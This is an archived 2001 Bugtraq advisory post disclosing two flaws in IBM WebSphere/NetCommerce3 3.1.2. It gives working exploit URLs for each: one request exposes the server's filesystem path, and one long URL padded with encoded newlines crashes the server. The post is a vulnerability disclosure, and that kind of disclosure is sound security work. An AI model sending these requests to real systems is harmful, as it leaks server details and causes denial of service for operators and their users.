NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2001-04

From: ET LoWNOISE (etCYBERSPACE.ORG)
Date: Thu Apr 12 2001 - 23:28:48 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

PRODUCT: IBM Websphere/NetCommerce3
vERSION: 3.1.2 , posibly others (Unix, and NT)

+PATH REVEALING PROBLEM
Exploit:

http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK

Result:

DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK
in file /usr/NetCommerce3/macros/en_US/macro.d2w

+DoS with Long URL
Exploit:

http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a

On UNIX and NT Netcommerce will crash:
Server Not Responding

[-----------------------------------------------------------------------]

Efrain 'ET' Torres
etcyberspace.org
[LoWNOISE] Colombia 2001

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]